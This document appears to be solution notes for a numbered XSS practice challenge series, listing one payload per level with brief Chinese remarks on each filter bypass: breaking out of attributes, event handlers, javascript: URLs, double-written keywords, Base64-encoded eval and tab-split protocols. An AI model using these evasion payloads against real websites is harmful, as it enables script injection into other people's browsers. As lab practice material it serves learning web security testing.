#1
<script>alert(document.domain)</script>
#2
""</b> <script>alert(document.domain)</script>
#3
<svg></svg><script>alert(document.domain)</script>
#4
h3是隐藏参数,需要抓包
"><script>alert(document.domain)</script>
#5
修改长度限制
"><script>alert(document.domain)</script>
#6
转义了< >
111111" onmouseover="alert(document.domain);
#7
转义了< > '
view plaincopyprint onmousemove=alert(document.domain)
#8
JavaScript伪协议
javascript:alert(document.domain)
#9
utf-7 在Chrome和火狐浏览器器中已经被移除 跳过
#10
双写绕过
"><script>alert(document.domdomainain)</script>
Base64编码绕过
"><script>eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs='));</script>
#11
伪协议+编码绕过
"><a href="javascr	ipt:alert(document.domain);">xss</a>
#12
两个反引号可以闭合一个" 只有IE可以
``onmouseover=alert(document.domain);
